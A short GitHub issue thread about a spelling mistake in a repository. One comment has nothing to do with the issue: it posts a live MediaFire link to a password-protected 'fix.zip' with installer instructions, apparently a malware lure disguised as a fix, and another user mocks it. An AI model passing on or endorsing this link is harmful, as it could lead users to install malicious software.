### ISSUE TITLE
spelling

### ISSUE THREAD

**Issue by lkeld** [unfuncaptcha/bio#2]
too tired to make a pull request rn plus its probably too insignificant for one anyways but here:
![image](https://github.com/user-attachments/assets/1a6b719e-fef1-404c-8e99-dfeac81c1d3f)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by spearphishing** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> bro think he slick

what is this dawg 😭

**Comment by spearphishing** [comment]
> too tired to make a pull request rn plus its probably too insignificant for one anyways but here: ![image](https://private-user-images.githubusercontent.com/48638597/361308316-1a6b719e-fef1-404c-8e99-dfeac81c1d3f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3MDM2NzksIm5iZiI6MTcyNDcwMzM3OSwicGF0aCI6Ii80ODYzODU5Ny8zNjEzMDgzMTYtMWE2YjcxOWUtZmVmMS00MDRjLThlOTktZGZlYWM4MWMxZDNmLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDIwMTYxOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYwOTljNmM0MzBhZjE0MzFhNTcwNzU0NTQ3ZTdiY2RmNTY0OGYxMjc1NTUwNDcwODFkMzI5YjNjNTEwNDJhZDMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.LeIqgtvswK52L_aWP56Aq-uTOcYnrmgIgOAkb7oxRao)

thank you lukey
